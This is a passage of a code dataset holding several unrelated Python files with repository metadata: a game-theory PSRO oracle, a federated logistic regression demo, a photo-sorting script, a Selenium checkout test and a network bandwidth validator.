add_counter = gain_on_average\n else:\n add_counter = 1\n\n totals += policy_total\n count += add_counter\n\n # Avoid the 0 / 0 case.\n return totals / max(1, count)\n\n\nclass EvolutionaryStrategyOracle(AbstractOracle):\n \"\"\"Oracle using evolutionary strategies to compute BR to policies.\"\"\"\n\n def __init__(self, alpha=0.1, beta=10, n_evolution_tests=100, **kwargs):\n self._alpha = alpha\n self._beta = beta\n self._n_evolution_tests = n_evolution_tests\n super(EvolutionaryStrategyOracle, self).__init__(**kwargs)\n\n def __call__(self, game, pol, total_policies, current_player,\n probabilities_of_playing_policies,\n **oracle_specific_execution_kwargs):\n \"\"\"Call method for oracle, returns best response against a set of policies.\n Args:\n game: The game on which the optimization process takes place.\n pol: The current policy, in policy.Policy, from which we wish to start\n optimizing.\n total_policies: A list of all policy.Policy strategies used for training,\n including the one for the current player.\n current_player: Integer representing the current player.\n probabilities_of_playing_policies: A list of arrays representing, per\n player, the probabilities of playing each policy in total_policies for\n the same player.\n **oracle_specific_execution_kwargs: Other set of arguments, for\n compatibility purposes. 
Can for example represent whether to Rectify\n Training or not.\n Returns:\n Expected (Epsilon) best response.\n \"\"\"\n max_perf = -np.infty\n best_policy = None\n # Easy to multithread, but this is python.\n for _ in range(self._n_evolution_tests):\n new_policy = pol.copy_with_noise(alpha=self._alpha, beta=self._beta)\n new_value = self.evaluate_policy(game, new_policy, total_policies,\n current_player,\n probabilities_of_playing_policies,\n **oracle_specific_execution_kwargs)\n\n lambda_weight = oracle_specific_execution_kwargs.get(\"lambda_weight\")\n solver = oracle_specific_execution_kwargs.get(\"solver\")\n\n # Update metagame with new policy\n new_policies = [[] for _ in range(2)]\n new_policies[current_player] = [new_policy]\n meta_games = self.update_metagame(solver, new_policies)\n M = meta_games[current_player]\n\n # Compute cardinality\n M = preprocessing.normalize(M, norm='l2', axis=1) # Normalise\n L = M @ M.T # Compute kernel\n L_card = np.trace(np.eye(L.shape[0]) - np.linalg.inv(L + np.eye(L.shape[0]))) # Compute cardinality\n\n new_value = lambda_weight*new_value + (1-lambda_weight)*L_card\n\n if new_value > max_perf:\n max_perf = new_value\n best_policy = new_policy\n self.l_card[current_player] = L_card\n\n return best_policy\n \n \n def update_metagame(self, solver, new_policies, seed=None):\n \"\"\"Given new agents in _new_policies, update meta_games through simulations.\n Args:\n seed: Seed for environment generation.\n Returns:\n Meta game payoff matrix.\n \"\"\"\n if seed is not None:\n np.random.seed(seed=seed)\n\n # Concatenate both lists.\n updated_policies = [\n solver._policies[k] + new_policies[k]\n for k in range(solver._num_players)\n ]\n\n # Each metagame will be (num_strategies)^self._num_players.\n # There are self._num_player metagames, one per player.\n total_number_policies = [\n len(updated_policies[k]) for k in range(solver._num_players)\n ]\n number_older_policies = [\n len(solver._policies[k]) for k in range(solver._num_players)\n ]\n number_new_policies = [\n len(new_policies[k]) for k in range(solver._num_players)\n ]\n\n # Initializing the matrix with nans to recognize unestimated states.\n meta_games = [\n np.full(tuple(total_number_policies), np.nan)\n for k in range(solver._num_players)\n ]\n\n # Filling the matrix with already-known values.\n older_policies_slice = tuple(\n [slice(len(solver._policies[k])) for k in range(solver._num_players)])\n for k in range(solver._num_players):\n meta_games[k][older_policies_slice] = solver._meta_games[k]\n\n # Filling the matrix for newly added policies.\n for current_player in range(solver._num_players):\n # Only iterate over new policies for current player ; compute on every\n # policy for the other players.\n range_iterators = [\n range(total_number_policies[k]) for k in range(current_player)\n ] + [range(number_new_policies[current_player])] + [\n range(total_number_policies[k])\n for k in range(current_player + 1, solver._num_players)\n ]\n for current_index in itertools.product(*range_iterators):\n used_index = list(current_index)\n used_index[current_player] += number_older_policies[current_player]\n if np.isnan(meta_games[current_player][tuple(used_index)]):\n estimated_policies = [\n updated_policies[k][current_index[k]]\n for k in range(current_player)\n ] + [\n new_policies[current_player][current_index[current_player]]\n ] + [\n updated_policies[k][current_index[k]]\n for k in range(current_player + 1, solver._num_players)\n ]\n utility_estimates = 
solver.sample_episodes(estimated_policies,\n solver._sims_per_entry)\n for k in range(solver._num_players):\n meta_games[k][tuple(used_index)] = utility_estimates[k]\n\n    return meta_games\n", "repo_name": "oslumbers/msc_diversity_psro", "sub_path": "tic_tac_toe_small/optimization_oracle.py", "file_name": "optimization_oracle.py", "file_ext": "py", "file_size_in_byte": 10897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.random.choice", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 101, "usage_type": "attribute"}, {"api_name": "abstract_meta_trainer.sample_episode", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.infty", "line_number": 159, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 179, "usage_type": "name"}, {"api_name": "numpy.trace", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 181, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.full", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 223, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 246, "usage_type": "call"}]} +{"seq_id": "71562023874", "text": "from lr_trainer import vertical_logistic_regression, taylor_logistic_regression, normal_logistic_regression\nfrom sklearn.metrics import roc_auc_score\nfrom input_data import load_data, vertically_partition_data\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Load the data, split it into training and test sets, and standardize it\nX_train, y_train, X_test, y_test = load_data()\nprint(\"Training data shape after splitting and standardization: {} rows, {} columns\".format(X_train.shape[0], X_train.shape[1]))\n\n# Set the model configuration parameters\nconfig = {\n 'n_iter': 20, # number of iterations\n 'eta': 0.05, # learning rate\n 'A_idx': [10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29], # feature indices of the Party A portion\n 'B_idx': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9], # feature indices of the Party B portion\n}\n\n# Split the dataset into the Party A and Party B portions\nXA_train, XB_train, XA_test, XB_test = vertically_partition_data(X_train, X_test, config['A_idx'], config['B_idx'])\nprint('Shape of the Party A portion: {}'.format(XA_train.shape))\nprint('Shape of the Party B portion: {}'.format(XB_train.shape))\n\n# Start training\nfl_loss, fl_theta_a, fl_theta_b = vertical_logistic_regression(XA_train, XB_train, y_train, config)\nnorm_loss, normal_theta = normal_logistic_regression(X_train, y_train, X_test, y_test, config)\ntaylor_loss, taylor_theta = taylor_logistic_regression(X_train, y_train, X_test, y_test, config)\n\n# Compute and plot the AUC and accuracy\n# For the federated LR, compute the predicted probabilities on the test set\nfl_y_prob = 1/(1 + np.exp(-XA_test.dot(fl_theta_a) - XB_test.dot(fl_theta_b)))\ntaylor_y_prob = 1/(1 + np.exp(-X_test.dot(taylor_theta)))\nnormal_y_prob = 1/(1 + np.exp(-X_test.dot(normal_theta)))\n\nfl_y_train_prob = 1/(1 + np.exp(-XA_train.dot(fl_theta_a) - XB_train.dot(fl_theta_b)))\ntaylor_y_train_prob = 1/(1 + np.exp(-X_train.dot(taylor_theta)))\nnormal_y_train_prob = 1/(1 + np.exp(-X_train.dot(normal_theta)))\n\nprint(\"train fl lr auc\", roc_auc_score(y_train, fl_y_train_prob))\nprint(\"train taylor lr auc\", 
roc_auc_score(y_train, taylor_y_train_prob))\nprint(\"train normal lr auc\", roc_auc_score(y_train, normal_y_train_prob))\n\nprint(\"test fl lr auc\", roc_auc_score(y_test, fl_y_prob))\nprint(\"test taylor lr auc\", roc_auc_score(y_test, taylor_y_prob))\nprint(\"test normal lr auc\", roc_auc_score(y_test, normal_y_prob))\n\n\n# Show the fitted loss curves\n_ = plt.plot(range(len(taylor_loss)), taylor_loss, c=\"blue\", label=\"taylor lr loss\")\n_ = plt.plot(range(len(fl_loss)), fl_loss, label=\"vertical lr loss\")\n_ = plt.plot(range(len(norm_loss)), norm_loss, label=\"normal lr loss\")\n\nplt.xlabel(\"step\")\nplt.ylabel(\"loss value\")\nplt.legend(loc=\"upper right\")\n\nplt.show()", "repo_name": "HuangNing616/neo_fl", "sub_path": "fl_demo.py", "file_name": "fl_demo.py", "file_ext": "py", "file_size_in_byte": 2672, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "input_data.load_data", "line_number": 9, "usage_type": "call"}, {"api_name": "input_data.vertically_partition_data", "line_number": 21, "usage_type": "call"}, {"api_name": "lr_trainer.vertical_logistic_regression", "line_number": 26, "usage_type": "call"}, {"api_name": "lr_trainer.normal_logistic_regression", "line_number": 27, "usage_type": "call"}, {"api_name": "lr_trainer.taylor_logistic_regression", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "37042407119", "text": "import os\nimport shutil\nimport subprocess\nfrom datetime import datetime\nimport 
argparse\n\n\n# separate photos/video files by time\ndef separate_photos_by_time(root_dir):\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n if is_image(file):\n creation_time = os.path.getmtime(file_path)\n time_object = datetime.fromtimestamp(creation_time)\n dest = os.path.join(\n root_dir, f\"{time_object.year:04d}-{time_object.month:02d}\"\n )\n if not os.path.exists(dest):\n os.makedirs(dest)\n shutil.move(file_path, os.path.join(dest, file))\n\n\n# separate photos by type (non-images are put into folder called 'video')\ndef separate_photos_by_type(root_dir):\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n if is_image(file):\n extension = file.split(\".\")[-1].lower()\n dest = os.path.join(root_dir, extension)\n else: # video\n dest = os.path.join(root_dir, \"video\")\n\n if not os.path.exists(dest):\n os.makedirs(dest)\n shutil.move(file_path, os.path.join(dest, file))\n\n\n# convert HEIC to JPG\ndef convert_heic_to_jpg(root_dir):\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n if file.lower().endswith(\".heic\"):\n output_file_path = os.path.splitext(file_path)[0] + \".jpg\"\n subprocess.run([\"heif-convert\", file_path, output_file_path])\n os.remove(file_path)\n\n\n# check if the file is an image file\ndef is_image(filename):\n return any(\n filename.lower().endswith(extension)\n for extension in [\".arw\", \".jpg\", \".jpeg\", \".png\", \".heic\"]\n )\n\n\n# extract all content from subdirectories into the root directory\n# assumes that all files have different names\ndef extract_subdirectories(root_dir):\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n shutil.move(file_path, os.path.join(root_dir, file))\n for root, dirs, files in os.walk(root_dir):\n for directory in dirs:\n if directory != root_dir:\n shutil.rmtree(os.path.join(root, directory))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Photo management automation script.\")\n parser.add_argument(\"--time\", action=\"store_true\", help=\"Separate photos by time\")\n parser.add_argument(\"--type\", action=\"store_true\", help=\"Separate photos by type\")\n parser.add_argument(\"--convert\", action=\"store_true\", help=\"Convert HEIC to JPG\")\n parser.add_argument(\n \"--extract\", action=\"store_true\", help=\"Extract all content from subdirectories\"\n )\n parser.add_argument(\"directory\", help=\"Directory path\")\n\n args = parser.parse_args()\n\n if os.path.isdir(args.directory):\n if args.extract:\n extract_subdirectories(args.directory)\n print(\"Extracted content from subdirectories.\")\n if args.convert:\n convert_heic_to_jpg(args.directory)\n print(\"Converted HEIC to JPG.\")\n if args.time:\n separate_photos_by_time(args.directory)\n print(\"Separated by time (yyyy-mm).\")\n if args.type:\n separate_photos_by_type(args.directory)\n print(\"Separated by file type.\")\n print(\"All done!\")\n else:\n print(\"Invalid directory path.\")\n", "repo_name": "irisxu02/photo-scripts", "sub_path": "organize.py", "file_name": "organize.py", "file_ext": "py", "file_size_in_byte": 3660, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.walk", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 20, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 36, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 47, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 48, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 65, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 66, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}]} +{"seq_id": "444303573", "text": "import allure\nimport pytest\nfrom pages.order_page import OrderPage\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n@allure.description('Тест для браузера Chrome')\ndef test_order_input(browser):\n order_page = OrderPage(browser)\n order_page.open()\n 
order_page.enter_name()\n order_page.enter_surname()\n order_page.enter_address()\n order_page.select_random_station()\n order_page.enter_phone_number()\n order_page.click_next_page_button()\n order_page.select_date()\n order_page.select_rental_period()\n order_page.select_colour_black()\n order_page.enter_comment()\n order_page.click_order_button()\n order_page.click_confirm_order_button()\n element = order_page.find_element((By.CSS_SELECTOR, \"div.Order_ModalHeader__3FDaJ\"))\n try:\n assert \"Заказ оформлен\" in element.text # \"Order placed\" (the page shows Russian UI text)\n assert \"Номер заказа:\" in element.text # \"Order number:\"\n assert \"Запишите его\" in element.text # \"Write it down\"\n except AssertionError:\n pytest.skip(\"The developers have not finished the Chrome version yet\")\n", "repo_name": "OlegW307/QASprint_4", "sub_path": "tests/test_workflow_order_success.py", "file_name": "test_workflow_order_success.py", "file_ext": "py", "file_size_in_byte": 1227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pages.order_page.OrderPage", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}, {"api_name": "pytest.skip", "line_number": 31, "usage_type": "call"}, {"api_name": "allure.description", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "14326317443", "text": "import logging\nimport time\nfrom threading import RLock\nfrom typing import List, Set, Type\n\nfrom pymmortals import immortalsglobals as ig\nfrom pymmortals import triples_helper\nfrom pymmortals.datatypes.interfaces import AbstractMonitor\nfrom pymmortals.datatypes.root_configuration import get_configuration\nfrom pymmortals.datatypes.routing import EventType, EventTags, EventTag\nfrom pymmortals.datatypes.scenariorunnerconfiguration import ScenarioRunnerConfiguration\nfrom pymmortals.generated.com.securboration.immortals.ontology.cp.gmeinterchangeformat import GmeInterchangeFormat\nfrom pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.analyticsevent import AnalyticsEvent\nfrom pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status import Status\nfrom pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.testresult import TestResult\nfrom pymmortals.generated.mil.darpa.immortals.core.api.validation.validators import Validators\nfrom pymmortals.monitors.server_network_traffic_monitor import ServerNetworkTrafficMonitor\nfrom pymmortals.validators.abstract_local_validator import AbstractLocalValidator\n\n_event_ticker_lock = RLock()\n_event_ticker = 0\n\n\ndef _create_bandwidth_calculated_event(bytes_used, event_time_ms=None):\n global _event_ticker, _event_ticker_lock\n\n with _event_ticker_lock:\n if event_time_ms is None:\n event_time_ms = time.time() * 1000\n\n event = AnalyticsEvent(\n type='combinedServerTrafficBytesPerSecond',\n eventSource='bandwidth-maximum-validator',\n eventTime=event_time_ms,\n eventRemoteSource='global',\n dataType='java.lang.Long',\n eventId=_event_ticker,\n data=str(bytes_used)\n )\n _event_ticker += 1\n return event\n\n\nclass BandwidthValidator(AbstractLocalValidator):\n @classmethod\n def identifier(cls) -> str:\n return Validators.BANDWIDTH_MAXIMUM_VALIDATOR.identifier\n\n @classmethod\n def get_monitor_classes(cls) -> Set[Type[AbstractMonitor]]:\n return {ServerNetworkTrafficMonitor}\n\n def run_time_ms(self) -> int:\n return self._run_time_ms\n\n def __init__(self, 
gif: GmeInterchangeFormat, runner_configuration: ScenarioRunnerConfiguration):\n super().__init__(gif=gif, runner_configuration=runner_configuration)\n self._offline_clients: List[str] = [a.instanceIdentifier\n for a in runner_configuration.scenario.deploymentApplications\n if a.applicationIdentifier.lower() == 'ataklite']\n self._timestamp_list: List[int] = []\n self._byte_list: List[int] = []\n\n self._max_hit_bandwidth_kilobits_per_second: int = -1\n\n validation_reporting_interval_secs = \\\n get_configuration().validation.bandwidthMonitorReportingIntervalMS / 1000\n\n self._sample_span_seconds: int = 0\n\n client_count = triples_helper.get_android_client_count(gif)\n image_broadcast_interval_ms = triples_helper.get_image_rate_ms(gif)\n pli_broadcast_interval_ms = triples_helper.get_pli_rate_ms(gif)\n\n for q in range(client_count):\n self._sample_span_seconds = \\\n max(self._sample_span_seconds, image_broadcast_interval_ms, pli_broadcast_interval_ms)\n\n self._sample_span_seconds /= 1000\n sample_delay_seconds = max(len(self._offline_clients) * 2, self._sample_span_seconds // 2)\n\n self._sample_span_seconds *= get_configuration().validation.bandwidthValidatorSampleDurationMultiplier\n\n # Wait for half the sample span for things to settle before starting to measure data\n self._lower_idx: int = sample_delay_seconds\n self._upper_idx: int = int((self._lower_idx + (self._sample_span_seconds / validation_reporting_interval_secs)))\n\n logging.debug('Bandwidth Sampling Starting Lower Idx: ' + str(self._lower_idx))\n logging.info('Bandwidth Sampling Starting Upper Idx: ' + str(self._upper_idx))\n\n self._maximum_bandwidth_kbits_per_second: int = triples_helper.get_bandwidth_constraint_kbit_per_second(gif)\n\n self._image_send_count = 0\n self._image_receive_count = 0\n self._run_time_ms = max(60, 3 * self._sample_span_seconds)\n\n def _receive_event(self, event_tag: EventTag, data: AnalyticsEvent):\n if isinstance(data, list):\n data_list = data\n else:\n data_list = [data]\n\n for event in data_list:\n if self._current_result.currentState == Status.RUNNING:\n\n if event_tag == EventTags.AnalyticsEventServerNetworkTrafficMeasuredBytes:\n\n bandwidth_calculated_event = None\n\n if len(self._offline_clients) == 0:\n self._timestamp_list.append(event.eventTime)\n self._byte_list.append(int(event.data))\n logging.debug(\"Bandwidth Timestamp: \" + str(event.eventTime))\n logging.debug(\"Bandwidth Total Bytes: \" + str(event.data))\n\n if self._upper_idx < len(self._timestamp_list):\n time_delta = self._timestamp_list[self._upper_idx] - self._timestamp_list[\n self._lower_idx]\n bytes_delta = self._byte_list[self._upper_idx] - self._byte_list[self._lower_idx]\n\n logging.debug(\"Bandwith Window Bytes Delta: \" + str(bytes_delta))\n logging.debug('Bandwidth Window Time Delta: ' + str(time_delta))\n\n bandwidth_kilobits_per_second = int((bytes_delta * 8 / 1000) / (time_delta / 1000))\n logging.debug('Bandwidth Kilobits Per Second: ' + str(bandwidth_kilobits_per_second))\n self._max_hit_bandwidth_kilobits_per_second = \\\n max(self._max_hit_bandwidth_kilobits_per_second,\n bandwidth_kilobits_per_second)\n\n if bandwidth_kilobits_per_second >= self._maximum_bandwidth_kbits_per_second:\n self._current_result.errorMessages.append(\n str(bandwidth_kilobits_per_second)\n + ' is greater than the maximum bandwidth of '\n + str(self._maximum_bandwidth_kbits_per_second) + '!')\n\n self._lower_idx += 1\n self._upper_idx += 1\n\n bandwidth_calculated_event = _create_bandwidth_calculated_event(\n 
(bandwidth_kilobits_per_second / 8 * 1000),\n event_time_ms=event.eventTime)\n\n if bandwidth_calculated_event is not None:\n ig.get_event_router().submit_asynchronously(\n EventTags.AnalyticsEventServerNetworkTrafficCalculatedBytesPerSec,\n bandwidth_calculated_event)\n\n elif event_tag.event_type == EventType.ANALYSIS and event.eventSource in self._offline_clients:\n self._offline_clients.remove(event.eventSource)\n\n def _attempt_validation(self, terminal_state: bool) -> TestResult:\n if terminal_state:\n if len(self._offline_clients) > 0:\n self._current_result.errorMessages.append(\"Not all clients have come online!\")\n\n if self._max_hit_bandwidth_kilobits_per_second <= 0:\n self._current_result.errorMessages.append(\n \"Not enough time has passed to collect an accurate bandwidth measurement!\")\n\n if len(self._current_result.errorMessages) > 0:\n self._current_result.currentState = Status.FAILURE\n\n else:\n self._current_result.detailMessages.append(\n 'The maximum bandwith over a ' + str(self._sample_span_seconds) +\n ' second window is '\n + str(self._max_hit_bandwidth_kilobits_per_second)\n + 'kilobits per second, which is below the threshold of '\n + str(self._maximum_bandwidth_kbits_per_second) + '.')\n self._current_result.currentState = Status.SUCCESS\n\n return self._current_result\n", "repo_name": "darpa-brass/bbn-immortals", "sub_path": "phase02/immortals_repo/harness/pymmortals/validators/bandwidth_validator.py", "file_name": "bandwidth_validator.py", "file_ext": "py", "file_size_in_byte": 8400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "threading.RLock", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.analyticsevent.AnalyticsEvent", "line_number": 31, "usage_type": "call"}, {"api_name": "pymmortals.validators.abstract_local_validator.AbstractLocalValidator", "line_number": 44, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.validation.validators.Validators.BANDWIDTH_MAXIMUM_VALIDATOR", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.validation.validators.Validators", "line_number": 47, "usage_type": "name"}, {"api_name": "pymmortals.monitors.server_network_traffic_monitor.ServerNetworkTrafficMonitor", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 50, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.interfaces.AbstractMonitor", "line_number": 50, "usage_type": "name"}, {"api_name": "pymmortals.generated.com.securboration.immortals.ontology.cp.gmeinterchangeformat.GmeInterchangeFormat", "line_number": 56, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.scenariorunnerconfiguration.ScenarioRunnerConfiguration", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.root_configuration.get_configuration", "line_number": 67, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper.get_android_client_count", "line_number": 71, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper", 
"line_number": 71, "usage_type": "name"}, {"api_name": "pymmortals.triples_helper.get_image_rate_ms", "line_number": 72, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper", "line_number": 72, "usage_type": "name"}, {"api_name": "pymmortals.triples_helper.get_pli_rate_ms", "line_number": 73, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper", "line_number": 73, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.root_configuration.get_configuration", "line_number": 82, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 88, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 89, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper.get_bandwidth_constraint_kbit_per_second", "line_number": 91, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper", "line_number": 91, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.routing.EventTag", "line_number": 97, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.analyticsevent.AnalyticsEvent", "line_number": 97, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status.RUNNING", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status", "line_number": 104, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.routing.EventTags.AnalyticsEventServerNetworkTrafficMeasuredBytes", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pymmortals.datatypes.routing.EventTags", "line_number": 106, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 114, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 121, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 125, "usage_type": "call"}, {"api_name": "pymmortals.immortalsglobals.get_event_router", "line_number": 144, "usage_type": "call"}, {"api_name": "pymmortals.immortalsglobals", "line_number": 144, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.routing.EventTags.AnalyticsEventServerNetworkTrafficCalculatedBytesPerSec", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pymmortals.datatypes.routing.EventTags", "line_number": 145, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.routing.EventType.ANALYSIS", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pymmortals.datatypes.routing.EventType", "line_number": 148, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status.FAILURE", "line_number": 161, 